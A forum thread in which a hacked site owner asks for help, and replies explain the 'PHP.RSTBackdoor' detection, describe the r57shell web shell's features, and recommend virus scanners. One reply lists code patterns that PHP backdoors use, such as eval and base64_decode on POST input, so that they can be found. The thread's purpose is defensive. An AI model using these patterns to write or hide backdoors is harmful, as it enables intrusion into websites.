SitePoint Sponsor

User Tag List

Results 1 to 17 of 17
  1. #1
    SitePoint Evangelist fs_tigre's Avatar
    Join Date
    Feb 2009
    Location
    Close to Chicago, Illinois
    Posts
    517
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Hacker left a file called “PHP.RSTBackdoor”

    Hi,

    I’m going to start from the beginning. I recently had two of my sites hacked, when the first one was hacked 6 months ago I basically uploaded new files and after this I made a complete back-up thinking that all files were ok, since everything was working fine. Three days ago the other one was hacked, but this time I only replaced the index page with my back-up file.

    Reading different threads in this forum I saw that somebody suggested to scan your computer even Macs which is what I’m running so, last night I decided to install Norton and scanned my computer and when it was done it found the back-up file I made after my first site was hacked and apparently inside this back-up file there is a file called “PHP.RSTBackdoor” which apparently is the one that contains the malicious code, I went and look for this file in my server and I couldn’t find it.

    Is there a way to search for this file in my server?

    Is there some sort of software like Norton to scan your server? Or how about the method I just described - create a complete site back-up and then scan it with Norton in your computer is this a valid option?

    Thanks a lot.
    Thank you very much!!!

  2. #2
    secure webapps for all Aleksejs's Avatar
    Join Date
    Apr 2008
    Location
    Riga, Latvia
    Posts
    755
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    apparently inside this back-up file there is a file called “PHP.RSTBackdoor” which apparently is the one that contains the malicious code
    That is actually - how virus vendor calls particular virus/malware. It is not an actual filename. Some of your PHP/JS/HTML files contain malicious JavaScript. Namely, from Symantec site: This threat requires the file r57shell.php to run. This file may already be present or may be manually copied to the compromised computer by the attacker.

    Is there a way to search for this file in my server?

    Is there some sort of software like Norton to scan your server? Or how about the method I just described - create a complete site back-up and then scan it with Norton in your computer is this a valid option?
    The usual procedure is to download all files to clean/uninfected PC and to scan them with your favourite virus-scanner.

  3. #3
    SitePoint Evangelist fs_tigre's Avatar
    Join Date
    Feb 2009
    Location
    Close to Chicago, Illinois
    Posts
    517
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    First of all thank you for your help.

    Would you be so kind and explain this a little bit more?

    This threat requires the file r57shell.php to run.
    What is this file? Norton already repaired the affected file, sorry if I'm not understanding.
    This file may already be present or may be manually copied to the compromised computer by the attacker.
    Can you explain this a little bit more?


    Thanks a lot for your help
    Thank you very much!!!

  4. #4
    secure webapps for all Aleksejs's Avatar
    Join Date
    Apr 2008
    Location
    Riga, Latvia
    Posts
    755
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I suppose your antivirus deleted that file, when detected. Now, how that file got into your system in first place - that is a good question. (~;

  5. #5
    SitePoint Evangelist fs_tigre's Avatar
    Join Date
    Feb 2009
    Location
    Close to Chicago, Illinois
    Posts
    517
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I suppose your antivirus deleted that file, when detected.
    It asked me if I wanted to repair it or delete it, I clicked repair but at the end I deleted the whole .rar backup file after Norton's repair.

    Now, how that file got into your system in first place - that is a good question. (~;
    Well, as I said its the complete site back-up I downloaded.

    Thanks a lot for your help
    Thank you very much!!!

  6. #6
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I find that Sophos is better at detecting some of the backdoor files than most other AV programs.

    You can download your entire site - everything to your local PC. Then use Sophos, they have a 30 day trial, and scan all of your files. This won't find everything but it will find more than many of the other AVs.

    Typically the backdoors will do something like:

    isset($_POST['somevariable'] or if(!empty($_POST['somevariable'])

    then either @eval('somevariable') or base64_decode('somevariable')

    These are just basic examples of what to look for. We've tested other backdoor "finders", some with over 4400 signatures, and rarely do they find more than one or two backdoors on a website that we've found over 20 on. Not promoting, just stating that these backdoors are difficult to find.

  7. #7
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I forgot, ClamAV is also good at detecting many backdoors. I haven't used the Windows version but the Linux version is great. I believe they both use the same signatures so the Windows version should be able to detect any backdoor that the Linux version does.

    Just an FYI...

  8. #8
    SitePoint Evangelist fs_tigre's Avatar
    Join Date
    Feb 2009
    Location
    Close to Chicago, Illinois
    Posts
    517
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    First of all thank you for your help!

    You can download your entire site - everything to your local PC.
    Excuse my ignorance but when you say the entire site this means the public folder only right?

    I find that Sophos is better at detecting some of the backdoor files than most other AV programs.
    So Norton is not a good program for this type of tasks?

    Learning a lot as I go... thanks to this forum (you guys)

    Thanks a lot!
    Thank you very much!!!

  9. #9
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,179
    Mentioned
    191 Post(s)
    Tagged
    2 Thread(s)
    Quote Originally Posted by fs_tigre View Post
    .....
    Excuse my ignorance but when you say the entire site this means the public folder only right?
    .....
    If you're on a shared host you should be able to download everything in your domain folder. The "public" folder and its "sibling" folders too. You won't be able to go above your domain folder - i.e. access to other sites and host-only folders - thats where the importance of reporting the incident to your host comes in.

  10. #10
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    As Mittineague has already stated, everything in your public folder and it's sibling folders. Basically everything you have access to with FTP. Keep in mind that when a hacker gets control of your website, they have at least the same access as you do. So whatever you have access to on a shared host, is what you want to download to your PC.

  11. #11
    SitePoint Evangelist fs_tigre's Avatar
    Join Date
    Feb 2009
    Location
    Close to Chicago, Illinois
    Posts
    517
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks a lot for your input.

    I already informed my host.

    Can I use Norton to scan my files? Will it detect and fix malicious files?

    Thanks a lot.
    Thank you very much!!!

  12. #12
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Some - yes. Not all of them.

  13. #13
    SitePoint Evangelist fs_tigre's Avatar
    Join Date
    Feb 2009
    Location
    Close to Chicago, Illinois
    Posts
    517
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thank you for your help
    Thank you very much!!!

  14. #14
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    just a little info here...

    the PHP.RSTBackdoor is just the threat name, not the file name.

    ..and the r57shell.php is an advanced shellscript. it contains a dashboard, with among other things a vulnerability scanner, you can set file permissions, it got ftp etc etc... it's like an advanced toolbox.

    someone most likely scanned your site/host and found a vulnerability, and then they exploited it and got the script installed and opened a backdoor... and did whatever else they wanted.

    it can be embedded to other legal files or masked as a pic or something else, so make sure to search your files and folders for any suspicious files or code.

    looks like when you downloaded your site for a backup, you downloaded it with the script installed - you didn't clean it before you downloaded it, nor did you do it afterwards - make sure to have a clean backup so you don't install an infected backup.

    too many people makes this mistake - uploading an infected backup and history repeats itself...
    Who's to doom when the judge himself is dragged before the bar


  15. #15
    SitePoint Evangelist fs_tigre's Avatar
    Join Date
    Feb 2009
    Location
    Close to Chicago, Illinois
    Posts
    517
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thank a lot for your comments!
    Thank you very much!!!

  16. #16
    SitePoint Enthusiast
    Join Date
    Nov 2008
    Posts
    47
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Btw, if you are on a shared host with cpanel, you may have inbuilt antivirus facility too(my fav clamav). Scan your uploaded contents with antivirus online itself. Generally it is a better idea to delete the infected files there and reupload the the clean deleted contents.

    Also boot your pc with a clean bootable disk and scan your pc with an antivirus(like avgfree) and try a spyware scan too(use spybot or superantispyware - all free).
    ►ExpertWebHost.NET- Quality, reliable hosting service since 2008
    ►Instant Budget CPanel hosting- 24x7 Support
    ►Litespeed- Softaculous- RVSitebuilder- R1Soft backups
    SEO Hosting- Spread your websites on 10 servers with A Class IPs

  17. #17
    SitePoint Evangelist fs_tigre's Avatar
    Join Date
    Feb 2009
    Location
    Close to Chicago, Illinois
    Posts
    517
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Thanks a lot for your comments!

    Yes, I just noticed that I do have antivirus in my Cpanel.

    Thanks
    Thank you very much!!!


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •